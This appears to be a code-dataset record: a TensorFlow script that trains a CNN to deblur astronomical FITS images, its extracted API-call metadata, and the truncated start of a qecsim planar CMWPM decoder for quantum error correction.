'''Import this part to use TensorBoard for visualizing each node in the CNN.
'''
#DCNN's TensorFlow(GPU) Version
from astropy.io import fits
import os, glob, time
import logging,logging.handlers
import numpy as np
import tensorflow as tf
from manager import GPUManager
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
os.environ["CUDA_VISIBLE_DEVICES"] = "0,1"
#--------------------------------Envir Default---------------------------------#
gm = GPUManager()
max_step=150
log_dir='CNNinfo/'
save_dir=log_dir+'restore/'
checkpoint_dir=log_dir+'model/'
num,weight,height=(1,4096,4096)
#--------------------------------Logging Module--------------------------------#
LOG_FILE = log_dir+'train_detail.log'
if os.path.isfile(LOG_FILE) is True:
os.remove(LOG_FILE)
handler = logging.handlers.RotatingFileHandler(LOG_FILE, maxBytes = 10*1024*1024, backupCount = 5)
fmt = '%(asctime)s - %(filename)s:%(lineno)s - %(name)s - %(message)s'
formatter = logging.Formatter(fmt)
handler.setFormatter(formatter)
logger = logging.getLogger('train_detail')
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
#----------------------------------Function------------------------------------#
def Padding(Input,ker_size):
'''Image Padding Function
'''
xpadpre = int(np.floor(ker_size[0]/2.0))
xpadpost = ker_size[0] - xpadpre
ypadpre = int(np.floor(ker_size[1]/2.0))
ypadpost = ker_size[1] - ypadpre
paddings = [[0,0],[xpadpre,xpadpost],[ypadpre,ypadpost],[0,0]]
padded = tf.pad(Input,paddings,"SYMMETRIC")
return padded
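# Illustrative note on Padding above: for ker_size = [63, 63] it pads 31 rows/
# columns before and 32 after each spatial axis, so the subsequent 'VALID'
# convolution in Conv_Layer keeps roughly the original spatial size.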
def batch_normal(input,is_train ,is_out=True,decay=0.9999):
with tf.name_scope('BN'):
scale=tf.Variable(tf.ones([input.get_shape()[-1]]))
beta=tf.Variable(tf.zeros([input.get_shape()[-1]]))
pop_mean=tf.Variable(tf.zeros([input.get_shape()[-1]]),trainable=False)
pop_var=tf.Variable(tf.ones([input.get_shape()[-1]]),trainable=False)
if is_train:
if is_out:
batch_mean,batch_var = tf.nn.moments(input,[0,1,2])
else:
batch_mean,batch_var = tf.nn.moments(input,[0])
train_mean = tf.assign(pop_mean,pop_mean*decay+batch_mean*(1-decay))
train_var = tf.assign(pop_var,pop_var*decay+batch_var*(1-decay))
with tf.control_dependencies([train_mean,train_var]):
return tf.nn.batch_normalization(input,batch_mean,batch_var,beta,scale,0.0001)
else:
return tf.nn.batch_normalization(input,pop_mean,pop_var,beta,scale,0.0001)
def Conv_Layer(Input, k_num, k_size, p_size = 2, activity_func = None):
    '''Add a convolutional layer. If a raw tensor is used as Input, the output
    size would be smaller than the input size.
    '''
with tf.name_scope('Convolutional_Layer'):
padded = Padding(Input, k_size)
raw_image = tf.layers.Input(tensor = padded)
shape=raw_image.get_shape().as_list()
weights = tf.Variable(tf.truncated_normal([k_size[0],k_size[1],int(shape[3]),k_num],stddev=15.0,dtype=tf.float32))
biases = tf.Variable(tf.truncated_normal([k_num],stddev=5.0,dtype=tf.float32))
unBN = tf.add(tf.nn.conv2d(raw_image, weights, strides=[1, 1, 1, 1], padding='VALID'), biases)
Conv = batch_normal(unBN,is_train=True)
if activity_func is not None:
Act =activity_func(Conv,)
down_sample = tf.layers.max_pooling2d(Act, p_size, strides = 1, padding = 'valid')
else:
down_sample = tf.layers.max_pooling2d(Conv, p_size, strides = 1, padding = 'valid')
return down_sample
def Block(feature, num, kernel):
c_in = Conv_Layer(feature, num, [kernel,1], activity_func = tf.nn.relu)
c_out= Conv_Layer(c_in, num, [1,kernel], activity_func = tf.nn.relu)
return c_out -c_in
def mse(r,x):
with gm.auto_choice(mode=0):
return tf.reduce_mean(tf.square(r-x))
def tobatch(array,w,h):
pixelsize=array.shape[0]*array.shape[1]
batch=np.zeros([int(pixelsize/(h*w)),w,h],dtype=np.dtype('>i2'))
k=0
for i in range(int(array.shape[0]/h)):
for j in range(int(array.shape[1]/w)):
batch[k]=array[h*i:h*(i+1),w*j:w*(j+1)]
k+=1
return batch
def toarray(mesh):
n,w,h=mesh.shape
n_w=n_h=int(np.sqrt(n*w*h))
grid=np.sqrt(n)
array=np.zeros([n_w,n_h])
for i in range(n):
m=int(i/grid)
n=int(i%grid)
array[m*w:(m+1)*w,n*h:(n+1)*h]=mesh[i]
return array
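# Illustrative note on tobatch/toarray above: a (4096, 4096) frame tiled with
# w = h = 4096 gives a single (1, 4096, 4096) batch, and toarray reassembles a
# square tiling, so toarray(tobatch(img, 4096, 4096)) recovers the original
# layout (values cast to the batch dtype).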
#------------------------------------Input-------------------------------------#
with tf.name_scope('Placeholder'):
blur = tf.placeholder(tf.float32,[1 ,4096, 4096, 1], name='Blur')
oril = tf.placeholder(tf.float32,[1 ,4096, 4096, 1], name='Oril')
imgsize = oril.get_shape().as_list()
batch_size = imgsize[0]
tf.summary.image('Blur_input', blur, 10)
tf.summary.image('Oril_input', oril, 10)
#-----------------------------Add Hidden Layers--------------------------------#
with tf.name_scope('Hidden_Layer'): #Using multi GPUs
with gm.auto_choice(mode=0): #Allocating single GPUs
cl1 = Conv_Layer(blur, 16, [63,63], activity_func = tf.nn.relu)
cl2 = Block(cl1-blur, 16, 63)
cl3 = Block(cl2, 32, 31)
cl4 = Block(cl3, 64, 15)
cl5 = Block(cl4,128, 11)
cl6 = Block(cl5, 144, 9)
cl7 = Block(cl6, 192, 7)
cl8 = Block(cl7, 256, 5)
cl9 = Block(cl8, 512, 3)
cl10 = Block(cl9,1024, 1)
dense = tf.layers.dense(cl10, 1)
#dc3 = DeConv_Layer(cl3,12,1,activity_func = tf.nn.relu)
with tf.name_scope('Loss'):
pre = tf.reshape(dense,imgsize)+blur
loss=mse(pre,oril)
tf.summary.image('Output', pre, 10)
tf.summary.scalar('loss', loss)
with tf.name_scope('Train'):
step=tf.Variable(0,trainable=False)
learnrate=tf.train.exponential_decay(5.0, step, 100, 0.96, staircase = True)
train_step = tf.train.AdadeltaOptimizer(learnrate).minimize(loss, global_step = step)
#---------------------------------Read Data------------------------------------#
files=glob.glob('gauss127/*.fits')
files.sort(reverse = True)
trainset=open('train.txt','r')
train=[]
for trainname in trainset:
train.append(trainname.split('\n')[0])
#-----------------------------------Initiate-----------------------------------#
init = tf.global_variables_initializer()
config = tf.ConfigProto()
config.gpu_options.allow_growth=True
config.gpu_options.allocator_type = 'BFC'
with tf.Session(config = config) as sess:
sess.run(init)
merged = tf.summary.merge_all()
train_writer = tf.summary.FileWriter(log_dir + 'train', sess.graph)
test_writer = tf.summary.FileWriter(log_dir + 'test', sess.graph)
saver = tf.train.Saver(max_to_keep=128)
sess.graph.finalize()
#----------------------------------Iteration-----------------------------------#
for epoch in range(1,max_step+1):
trainloss = []
testloss = []
s=time.clock()
for fitsfile in files:
name=fitsfile.split('/')[-1]
blurred=fits.open('gauss127/'+name)[0].data
try:
original=fits.open('original/'+name)[0].data
except IOError:
original=np.zeros(blurred.shape)
blurred=tobatch(blurred,weight,height)
original=tobatch(original,weight,height)
blurred=blurred.reshape([num,weight,height,1])
original=original.reshape([num,weight,height,1])
if name in train:
epoch_result =np.zeros([num,weight,height])
for batch in range(0,num):
Input_x=np.zeros([1,weight,height,1],dtype=np.float32)
Input_y=np.zeros([1,weight,height,1],dtype=np.float32)
Input_x[0]=np.float32(blurred[batch])
Input_y[0]=np.float32(original[batch])
_,lvalue,summary,result=sess.run([train_step,loss,merged,pre],
feed_dict={blur:Input_x,oril:Input_y})
train_writer.add_summary(summary, epoch)
saver.save(sess, checkpoint_dir + 'model'+str(batch)+'.ckpt', global_step=batch+1,write_meta_graph=False,write_state=False)
epoch_result[batch]=result.reshape(weight,height)
epoch_result=toarray(epoch_result)
recon=np.int16(epoch_result)
trainloss.append(lvalue)
train_writer.close()
if os.path.isfile(save_dir+'Train_'+name) is True:
os.remove(save_dir+'Train_'+name)
fits.HDUList([fits.PrimaryHDU(recon)]).writeto(save_dir+'Train_'+name)
else:
epoch_result =np.zeros([num,weight,height])
for batch in range(0,num):
Input_x=np.zeros([1,weight,height,1],dtype=np.float32)
Input_y=np.zeros([1,weight,height,1],dtype=np.float32)
Input_x[0]=np.float32(blurred[batch])
Input_y[0]=np.float32(original[batch])
saver.restore(sess, checkpoint_dir +'model'+str(batch)+'.ckpt-'+str(batch+1))
lvalue,summary,result=sess.run([loss,merged,pre],
feed_dict={blur:Input_x,oril:Input_y})
test_writer.add_summary(summary, epoch)
epoch_result[batch]=result.reshape(weight,height)
epoch_result=toarray(epoch_result)
recon=np.int16(epoch_result)
testloss.append(lvalue)
test_writer.close()
if os.path.isfile(save_dir +'Test_'+name) is True:
os.remove(save_dir+'Test_'+name)
fits.HDUList([fits.PrimaryHDU(recon)]).writeto(save_dir+'Test_'+name)
e=time.clock()
print('Epoch %d mean train loss is %e, time is %f.'%(epoch,np.mean(trainloss),(e-s)))
print('Epoch %d mean test loss is %e.'%(epoch,np.mean(testloss)))
logger.info('Epoch %d mean train loss is %e, time is %f'%(epoch,np.mean(trainloss),(e-s)))
logger.info('Epoch %d mean test loss is %e.'%(epoch,np.mean(testloss)))
if os.path.isfile('residual/'+name) is True:
os.remove('residual/'+name)
original=toarray(original.reshape(num,weight,height))
fits.HDUList([fits.PrimaryHDU(original-recon)]).writeto('residual/'+name)
|
[
"tensorflow.nn.batch_normalization",
"os.remove",
"tensorflow.train.AdadeltaOptimizer",
"numpy.floor",
"tensorflow.reshape",
"astropy.io.fits.PrimaryHDU",
"logging.Formatter",
"tensorflow.ConfigProto",
"os.path.isfile",
"tensorflow.Variable",
"tensorflow.assign",
"tensorflow.nn.conv2d",
"tensorflow.layers.max_pooling2d",
"glob.glob",
"numpy.mean",
"tensorflow.truncated_normal",
"tensorflow.nn.moments",
"tensorflow.layers.Input",
"manager.GPUManager",
"tensorflow.pad",
"time.clock",
"tensorflow.placeholder",
"tensorflow.summary.FileWriter",
"tensorflow.name_scope",
"tensorflow.summary.merge_all",
"tensorflow.summary.image",
"tensorflow.control_dependencies",
"tensorflow.summary.scalar",
"tensorflow.train.Saver",
"tensorflow.global_variables_initializer",
"tensorflow.Session",
"astropy.io.fits.open",
"tensorflow.train.exponential_decay",
"numpy.float32",
"tensorflow.layers.dense",
"numpy.zeros",
"numpy.dtype",
"tensorflow.square",
"numpy.int16",
"logging.handlers.RotatingFileHandler",
"logging.getLogger",
"numpy.sqrt"
] |
[((659, 671), 'manager.GPUManager', 'GPUManager', ([], {}), '()\n', (669, 671), False, 'from manager import GPUManager\n'), ((991, 1083), 'logging.handlers.RotatingFileHandler', 'logging.handlers.RotatingFileHandler', (['LOG_FILE'], {'maxBytes': '(10 * 1024 * 1024)', 'backupCount': '(5)'}), '(LOG_FILE, maxBytes=10 * 1024 * 1024,\n backupCount=5)\n', (1027, 1083), False, 'import logging, logging.handlers\n'), ((1169, 1191), 'logging.Formatter', 'logging.Formatter', (['fmt'], {}), '(fmt)\n', (1186, 1191), False, 'import logging, logging.handlers\n'), ((1243, 1276), 'logging.getLogger', 'logging.getLogger', (['"""train_detail"""'], {}), "('train_detail')\n", (1260, 1276), False, 'import logging, logging.handlers\n'), ((6538, 6566), 'glob.glob', 'glob.glob', (['"""gauss127/*.fits"""'], {}), "('gauss127/*.fits')\n", (6547, 6566), False, 'import os, glob, time\n'), ((6800, 6833), 'tensorflow.global_variables_initializer', 'tf.global_variables_initializer', ([], {}), '()\n', (6831, 6833), True, 'import tensorflow as tf\n'), ((6844, 6860), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {}), '()\n', (6858, 6860), True, 'import tensorflow as tf\n'), ((920, 944), 'os.path.isfile', 'os.path.isfile', (['LOG_FILE'], {}), '(LOG_FILE)\n', (934, 944), False, 'import os, glob, time\n'), ((958, 977), 'os.remove', 'os.remove', (['LOG_FILE'], {}), '(LOG_FILE)\n', (967, 977), False, 'import os, glob, time\n'), ((1746, 1782), 'tensorflow.pad', 'tf.pad', (['Input', 'paddings', '"""SYMMETRIC"""'], {}), "(Input, paddings, 'SYMMETRIC')\n", (1752, 1782), True, 'import tensorflow as tf\n'), ((4559, 4569), 'numpy.sqrt', 'np.sqrt', (['n'], {}), '(n)\n', (4566, 4569), True, 'import numpy as np\n'), ((4580, 4600), 'numpy.zeros', 'np.zeros', (['[n_w, n_h]'], {}), '([n_w, n_h])\n', (4588, 4600), True, 'import numpy as np\n'), ((4818, 4846), 'tensorflow.name_scope', 'tf.name_scope', (['"""Placeholder"""'], {}), "('Placeholder')\n", (4831, 4846), True, 'import tensorflow as tf\n'), ((4859, 4918), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32', '[1, 4096, 4096, 1]'], {'name': '"""Blur"""'}), "(tf.float32, [1, 4096, 4096, 1], name='Blur')\n", (4873, 4918), True, 'import tensorflow as tf\n'), ((4930, 4989), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32', '[1, 4096, 4096, 1]'], {'name': '"""Oril"""'}), "(tf.float32, [1, 4096, 4096, 1], name='Oril')\n", (4944, 4989), True, 'import tensorflow as tf\n'), ((5067, 5107), 'tensorflow.summary.image', 'tf.summary.image', (['"""Blur_input"""', 'blur', '(10)'], {}), "('Blur_input', blur, 10)\n", (5083, 5107), True, 'import tensorflow as tf\n'), ((5112, 5152), 'tensorflow.summary.image', 'tf.summary.image', (['"""Oril_input"""', 'oril', '(10)'], {}), "('Oril_input', oril, 10)\n", (5128, 5152), True, 'import tensorflow as tf\n'), ((5240, 5269), 'tensorflow.name_scope', 'tf.name_scope', (['"""Hidden_Layer"""'], {}), "('Hidden_Layer')\n", (5253, 5269), True, 'import tensorflow as tf\n'), ((6036, 6057), 'tensorflow.name_scope', 'tf.name_scope', (['"""Loss"""'], {}), "('Loss')\n", (6049, 6057), True, 'import tensorflow as tf\n'), ((6127, 6162), 'tensorflow.summary.image', 'tf.summary.image', (['"""Output"""', 'pre', '(10)'], {}), "('Output', pre, 10)\n", (6143, 6162), True, 'import tensorflow as tf\n'), ((6167, 6198), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""loss"""', 'loss'], {}), "('loss', loss)\n", (6184, 6198), True, 'import tensorflow as tf\n'), ((6211, 6233), 'tensorflow.name_scope', 'tf.name_scope', (['"""Train"""'], {}), "('Train')\n", (6224, 
6233), True, 'import tensorflow as tf\n'), ((6245, 6276), 'tensorflow.Variable', 'tf.Variable', (['(0)'], {'trainable': '(False)'}), '(0, trainable=False)\n', (6256, 6276), True, 'import tensorflow as tf\n'), ((6290, 6354), 'tensorflow.train.exponential_decay', 'tf.train.exponential_decay', (['(5.0)', 'step', '(100)', '(0.96)'], {'staircase': '(True)'}), '(5.0, step, 100, 0.96, staircase=True)\n', (6316, 6354), True, 'import tensorflow as tf\n'), ((6945, 6970), 'tensorflow.Session', 'tf.Session', ([], {'config': 'config'}), '(config=config)\n', (6955, 6970), True, 'import tensorflow as tf\n'), ((7014, 7036), 'tensorflow.summary.merge_all', 'tf.summary.merge_all', ([], {}), '()\n', (7034, 7036), True, 'import tensorflow as tf\n'), ((7056, 7108), 'tensorflow.summary.FileWriter', 'tf.summary.FileWriter', (["(log_dir + 'train')", 'sess.graph'], {}), "(log_dir + 'train', sess.graph)\n", (7077, 7108), True, 'import tensorflow as tf\n'), ((7127, 7178), 'tensorflow.summary.FileWriter', 'tf.summary.FileWriter', (["(log_dir + 'test')", 'sess.graph'], {}), "(log_dir + 'test', sess.graph)\n", (7148, 7178), True, 'import tensorflow as tf\n'), ((7191, 7222), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {'max_to_keep': '(128)'}), '(max_to_keep=128)\n', (7205, 7222), True, 'import tensorflow as tf\n'), ((1518, 1545), 'numpy.floor', 'np.floor', (['(ker_size[0] / 2.0)'], {}), '(ker_size[0] / 2.0)\n', (1526, 1545), True, 'import numpy as np\n'), ((1601, 1628), 'numpy.floor', 'np.floor', (['(ker_size[1] / 2.0)'], {}), '(ker_size[1] / 2.0)\n', (1609, 1628), True, 'import numpy as np\n'), ((1869, 1888), 'tensorflow.name_scope', 'tf.name_scope', (['"""BN"""'], {}), "('BN')\n", (1882, 1888), True, 'import tensorflow as tf\n'), ((3001, 3037), 'tensorflow.name_scope', 'tf.name_scope', (['"""Convolutional_Layer"""'], {}), "('Convolutional_Layer')\n", (3014, 3037), True, 'import tensorflow as tf\n'), ((3099, 3129), 'tensorflow.layers.Input', 'tf.layers.Input', ([], {'tensor': 'padded'}), '(tensor=padded)\n', (3114, 3129), True, 'import tensorflow as tf\n'), ((4534, 4552), 'numpy.sqrt', 'np.sqrt', (['(n * w * h)'], {}), '(n * w * h)\n', (4541, 4552), True, 'import numpy as np\n'), ((5944, 5968), 'tensorflow.layers.dense', 'tf.layers.dense', (['cl10', '(1)'], {}), '(cl10, 1)\n', (5959, 5968), True, 'import tensorflow as tf\n'), ((6069, 6095), 'tensorflow.reshape', 'tf.reshape', (['dense', 'imgsize'], {}), '(dense, imgsize)\n', (6079, 6095), True, 'import tensorflow as tf\n'), ((7425, 7437), 'time.clock', 'time.clock', ([], {}), '()\n', (7435, 7437), False, 'import os, glob, time\n'), ((10362, 10374), 'time.clock', 'time.clock', ([], {}), '()\n', (10372, 10374), False, 'import os, glob, time\n'), ((2405, 2469), 'tensorflow.assign', 'tf.assign', (['pop_mean', '(pop_mean * decay + batch_mean * (1 - decay))'], {}), '(pop_mean, pop_mean * decay + batch_mean * (1 - decay))\n', (2414, 2469), True, 'import tensorflow as tf\n'), ((2485, 2546), 'tensorflow.assign', 'tf.assign', (['pop_var', '(pop_var * decay + batch_var * (1 - decay))'], {}), '(pop_var, pop_var * decay + batch_var * (1 - decay))\n', (2494, 2546), True, 'import tensorflow as tf\n'), ((2732, 2804), 'tensorflow.nn.batch_normalization', 'tf.nn.batch_normalization', (['input', 'pop_mean', 'pop_var', 'beta', 'scale', '(0.0001)'], {}), '(input, pop_mean, pop_var, beta, scale, 0.0001)\n', (2757, 2804), True, 'import tensorflow as tf\n'), ((3330, 3388), 'tensorflow.truncated_normal', 'tf.truncated_normal', (['[k_num]'], {'stddev': '(5.0)', 'dtype': 'tf.float32'}), 
'([k_num], stddev=5.0, dtype=tf.float32)\n', (3349, 3388), True, 'import tensorflow as tf\n'), ((3412, 3483), 'tensorflow.nn.conv2d', 'tf.nn.conv2d', (['raw_image', 'weights'], {'strides': '[1, 1, 1, 1]', 'padding': '"""VALID"""'}), "(raw_image, weights, strides=[1, 1, 1, 1], padding='VALID')\n", (3424, 3483), True, 'import tensorflow as tf\n'), ((3647, 3711), 'tensorflow.layers.max_pooling2d', 'tf.layers.max_pooling2d', (['Act', 'p_size'], {'strides': '(1)', 'padding': '"""valid"""'}), "(Act, p_size, strides=1, padding='valid')\n", (3670, 3711), True, 'import tensorflow as tf\n'), ((3756, 3821), 'tensorflow.layers.max_pooling2d', 'tf.layers.max_pooling2d', (['Conv', 'p_size'], {'strides': '(1)', 'padding': '"""valid"""'}), "(Conv, p_size, strides=1, padding='valid')\n", (3779, 3821), True, 'import tensorflow as tf\n'), ((4137, 4153), 'tensorflow.square', 'tf.square', (['(r - x)'], {}), '(r - x)\n', (4146, 4153), True, 'import tensorflow as tf\n'), ((4274, 4289), 'numpy.dtype', 'np.dtype', (['""">i2"""'], {}), "('>i2')\n", (4282, 4289), True, 'import numpy as np\n'), ((6374, 6411), 'tensorflow.train.AdadeltaOptimizer', 'tf.train.AdadeltaOptimizer', (['learnrate'], {}), '(learnrate)\n', (6400, 6411), True, 'import tensorflow as tf\n'), ((10734, 10768), 'os.path.isfile', 'os.path.isfile', (["('residual/' + name)"], {}), "('residual/' + name)\n", (10748, 10768), False, 'import os, glob, time\n'), ((10788, 10817), 'os.remove', 'os.remove', (["('residual/' + name)"], {}), "('residual/' + name)\n", (10797, 10817), False, 'import os, glob, time\n'), ((2256, 2287), 'tensorflow.nn.moments', 'tf.nn.moments', (['input', '[0, 1, 2]'], {}), '(input, [0, 1, 2])\n', (2269, 2287), True, 'import tensorflow as tf\n'), ((2342, 2367), 'tensorflow.nn.moments', 'tf.nn.moments', (['input', '[0]'], {}), '(input, [0])\n', (2355, 2367), True, 'import tensorflow as tf\n'), ((2555, 2603), 'tensorflow.control_dependencies', 'tf.control_dependencies', (['[train_mean, train_var]'], {}), '([train_mean, train_var])\n', (2578, 2603), True, 'import tensorflow as tf\n'), ((2627, 2703), 'tensorflow.nn.batch_normalization', 'tf.nn.batch_normalization', (['input', 'batch_mean', 'batch_var', 'beta', 'scale', '(0.0001)'], {}), '(input, batch_mean, batch_var, beta, scale, 0.0001)\n', (2652, 2703), True, 'import tensorflow as tf\n'), ((8006, 8037), 'numpy.zeros', 'np.zeros', (['[num, weight, height]'], {}), '([num, weight, height])\n', (8014, 8037), True, 'import numpy as np\n'), ((8871, 8893), 'numpy.int16', 'np.int16', (['epoch_result'], {}), '(epoch_result)\n', (8879, 8893), True, 'import numpy as np\n'), ((9237, 9268), 'numpy.zeros', 'np.zeros', (['[num, weight, height]'], {}), '([num, weight, height])\n', (9245, 9268), True, 'import numpy as np\n'), ((10039, 10061), 'numpy.int16', 'np.int16', (['epoch_result'], {}), '(epoch_result)\n', (10047, 10061), True, 'import numpy as np\n'), ((7530, 7559), 'astropy.io.fits.open', 'fits.open', (["('gauss127/' + name)"], {}), "('gauss127/' + name)\n", (7539, 7559), False, 'from astropy.io import fits\n'), ((7697, 7720), 'numpy.zeros', 'np.zeros', (['blurred.shape'], {}), '(blurred.shape)\n', (7705, 7720), True, 'import numpy as np\n'), ((8107, 8157), 'numpy.zeros', 'np.zeros', (['[1, weight, height, 1]'], {'dtype': 'np.float32'}), '([1, weight, height, 1], dtype=np.float32)\n', (8115, 8157), True, 'import numpy as np\n'), ((8182, 8232), 'numpy.zeros', 'np.zeros', (['[1, weight, height, 1]'], {'dtype': 'np.float32'}), '([1, weight, height, 1], dtype=np.float32)\n', (8190, 8232), True, 
'import numpy as np\n'), ((8260, 8286), 'numpy.float32', 'np.float32', (['blurred[batch]'], {}), '(blurred[batch])\n', (8270, 8286), True, 'import numpy as np\n'), ((8318, 8345), 'numpy.float32', 'np.float32', (['original[batch]'], {}), '(original[batch])\n', (8328, 8345), True, 'import numpy as np\n'), ((9000, 9042), 'os.path.isfile', 'os.path.isfile', (["(save_dir + 'Train_' + name)"], {}), "(save_dir + 'Train_' + name)\n", (9014, 9042), False, 'import os, glob, time\n'), ((9068, 9105), 'os.remove', 'os.remove', (["(save_dir + 'Train_' + name)"], {}), "(save_dir + 'Train_' + name)\n", (9077, 9105), False, 'import os, glob, time\n'), ((9338, 9388), 'numpy.zeros', 'np.zeros', (['[1, weight, height, 1]'], {'dtype': 'np.float32'}), '([1, weight, height, 1], dtype=np.float32)\n', (9346, 9388), True, 'import numpy as np\n'), ((9413, 9463), 'numpy.zeros', 'np.zeros', (['[1, weight, height, 1]'], {'dtype': 'np.float32'}), '([1, weight, height, 1], dtype=np.float32)\n', (9421, 9463), True, 'import numpy as np\n'), ((9491, 9517), 'numpy.float32', 'np.float32', (['blurred[batch]'], {}), '(blurred[batch])\n', (9501, 9517), True, 'import numpy as np\n'), ((9549, 9576), 'numpy.float32', 'np.float32', (['original[batch]'], {}), '(original[batch])\n', (9559, 9576), True, 'import numpy as np\n'), ((10165, 10206), 'os.path.isfile', 'os.path.isfile', (["(save_dir + 'Test_' + name)"], {}), "(save_dir + 'Test_' + name)\n", (10179, 10206), False, 'import os, glob, time\n'), ((10233, 10269), 'os.remove', 'os.remove', (["(save_dir + 'Test_' + name)"], {}), "(save_dir + 'Test_' + name)\n", (10242, 10269), False, 'import os, glob, time\n'), ((10442, 10460), 'numpy.mean', 'np.mean', (['trainloss'], {}), '(trainloss)\n', (10449, 10460), True, 'import numpy as np\n'), ((10523, 10540), 'numpy.mean', 'np.mean', (['testloss'], {}), '(testloss)\n', (10530, 10540), True, 'import numpy as np\n'), ((10615, 10633), 'numpy.mean', 'np.mean', (['trainloss'], {}), '(trainloss)\n', (10622, 10633), True, 'import numpy as np\n'), ((10703, 10720), 'numpy.mean', 'np.mean', (['testloss'], {}), '(testloss)\n', (10710, 10720), True, 'import numpy as np\n'), ((7608, 7637), 'astropy.io.fits.open', 'fits.open', (["('original/' + name)"], {}), "('original/' + name)\n", (7617, 7637), False, 'from astropy.io import fits\n'), ((10900, 10933), 'astropy.io.fits.PrimaryHDU', 'fits.PrimaryHDU', (['(original - recon)'], {}), '(original - recon)\n', (10915, 10933), False, 'from astropy.io import fits\n'), ((9132, 9154), 'astropy.io.fits.PrimaryHDU', 'fits.PrimaryHDU', (['recon'], {}), '(recon)\n', (9147, 9154), False, 'from astropy.io import fits\n'), ((10296, 10318), 'astropy.io.fits.PrimaryHDU', 'fits.PrimaryHDU', (['recon'], {}), '(recon)\n', (10311, 10318), False, 'from astropy.io import fits\n')]
|
import functools
import itertools
import logging
import operator
import numpy as np
from qecsim import graphtools as gt
from qecsim.model import Decoder, cli_description
logger = logging.getLogger(__name__)
@cli_description('Converging MWPM ([factor] FLOAT >=0, ...)')
class PlanarCMWPMDecoder(Decoder):
"""
Implements a planar Converging Minimum Weight Perfect Matching (CMWPM) decoder.
Decoding algorithm:
* Resolve syndrome plaquettes using: :meth:`qecsim.models.planar.PlanarCode.syndrome_to_plaquette_indices`.
* Separate syndrome plaquettes into primal and dual plaquettes.
* For max_iterations:
* Resolve matched_primal_pairs using MWPM with edge weights between primal plaquettes given by the taxi-cab
distance through a background grid determined by the previous_matched_dual_pairs.
* Resolve matched_dual_pairs using MWPM with edge weights between dual plaquettes given by the taxi-cab distance
through a background grid determined by the previous_matched_primal_pairs.
* Stop if matched_primal_pairs = previous_matched_primal_pairs and matched_dual_pairs =
previous_matched_dual_pairs.
* Return recovery operator by applying the shortest path between matching pairs using:
:meth:`qecsim.models.planar.PlanarPauli.path`.
Notes on background grid:
* The grid is initialised with a grid factor (e.g. 3), box-shape (e.g. tight) and distance-algorithm (e.g. 1), and
each edge is given an initial weight (e.g. 1).
* The grid background is set such that, for each pair of syndrome indices (e.g. matched Z syndromes), all edges
      outside the chosen box-shape (see below), bounding the pair of indices, are multiplied by the grid factor.
* The distance between any two syndrome indices (e.g. unmatched X syndromes) is weighted by the taxi-cab path
through the background according to the chosen distance algorithm (see below).
* A minimum-weight perfect matching in a graph of syndrome indices (e.g. unmatched X syndromes) with edges weighted
by distance through the background gives matched pairs (e.g. matched X syndromes) taking into account correlations
with the background (e.g. matched Z syndromes).
* Box shape defines area outside of which the background is multiplied by the grid factor:
Tight::
X+ + +
+ + + +
+ + +
+ + + +
+ + +X
Rounded::
+ +
X+ + +
+ + + +
+ + + + +
+ + + +
+ + +X
+ +
Fitted::
+ + +
X+ + + +
+ + + +
+ + + + +
+ + + +
+ + + +X
+ + +
Loose::
+ + + +
+X+ + + +
+ + + +
+ + + + +
+ + + +
+ + + +X+
+ + + +
* Distance algorithm defines how the path sum over the background of weighted edges is calculated:
Alg. 1::
X+ + +
| + + +
+ + +
| + + +
- - -X
Alg. 2::
X+ + + X- - -
| + + + + + + |
min( + + + , + + + )
| + + + + + + |
- - -X + + +X
Alg. 4::
X+ + + X- - - X+ + + X- | +
| + + + + + + | | + + + + + + +
min( + + + , + + + , - - - , + | + )
| + + + + + + | + + + | + + + +
- - -X + + +X + + +X + - -X
"""
def __init__(self, factor=3, max_iterations=4, box_shape='t', distance_algorithm=4):
"""
Initialise new planar CMWPM decoder.
:param factor: Multiplication factor.
:type factor: int or float
:param max_iterations: Maximum number of iterations. (default=4, 0=null, 1=MWPM, 2+=CMWPM)
:type max_iterations: int
:param box_shape: Shape of background boxes. (default='t', 't'=tight, 'r'=rounded, 'f'=fitted, 'l'=loose)
:type box_shape: str
:param distance_algorithm: Distance algorithm. (default=4, 1=h+v, 2=min(h+v,v+h), 4=min(h+v,v+h,h+v+h,v+h+v)
:type distance_algorithm: int
:raises ValueError: if factor is not >= 0.0.
:raises ValueError: if max_iterations is not >= 0.
:raises ValueError: if box_shape not in ('t', 'r', 'f', 'l').
:raises ValueError: if distance_algorithm not in (1, 2, 4).
:raises TypeError: if any parameter is of an invalid type.
"""
try: # paranoid checking for CLI. (operator.index ensures the parameter can be treated as an int)
if not factor >= 0.0:
raise ValueError('{} valid factor values are number >= 0.0'.format(type(self).__name__))
if not operator.index(max_iterations) >= 0:
raise ValueError('{} valid max_iterations values are integer >= 0'.format(type(self).__name__))
if box_shape not in ('t', 'r', 'f', 'l'):
raise ValueError("{} valid box_shape values are ('t', 'r', 'f', 'l')".format(type(self).__name__))
if distance_algorithm not in (1, 2, 4):
raise ValueError('{} valid distance_algorithm values are (1, 2, 4)'.format(type(self).__name__))
except TypeError as ex:
raise TypeError('{} invalid parameter type'.format(type(self).__name__)) from ex
self._factor = factor
self._max_iterations = max_iterations
self._box_shape = box_shape
self._distance_algorithm = distance_algorithm
self._debug_iterations = False
@classmethod
def _recovery_pauli(cls, code, *match_sets):
# prepare recovery
recovery_pauli = code.new_pauli()
for matches in match_sets:
# apply paths
for a_index, b_index in matches:
# add path to recover
recovery_pauli.path(a_index, b_index)
return recovery_pauli
def decode(self, code, syndrome, **kwargs):
"""See :meth:`qecsim.model.Decoder.decode`"""
# get syndrome indices
syndrome_indices = code.syndrome_to_plaquette_indices(syndrome)
# split indices into primal and dual
primal_indices = frozenset(i for i in syndrome_indices if code.is_primal(i))
dual_indices = frozenset(i for i in syndrome_indices if code.is_dual(i))
# converge on matching
grid = self.StepGrid(code)
# prepare previous and current matches (in case max_iterations is 0)
previous_primal_matches = primal_matches = frozenset()
previous_dual_matches = dual_matches = frozenset()
# Catch and log floating point errors. This may happen if factor is large/small and there are many matches.
with np.errstate(all='raise'):
try:
for _ in range(self._max_iterations):
primal_matches = grid.mwpm(previous_dual_matches, primal_indices, factor=self._factor,
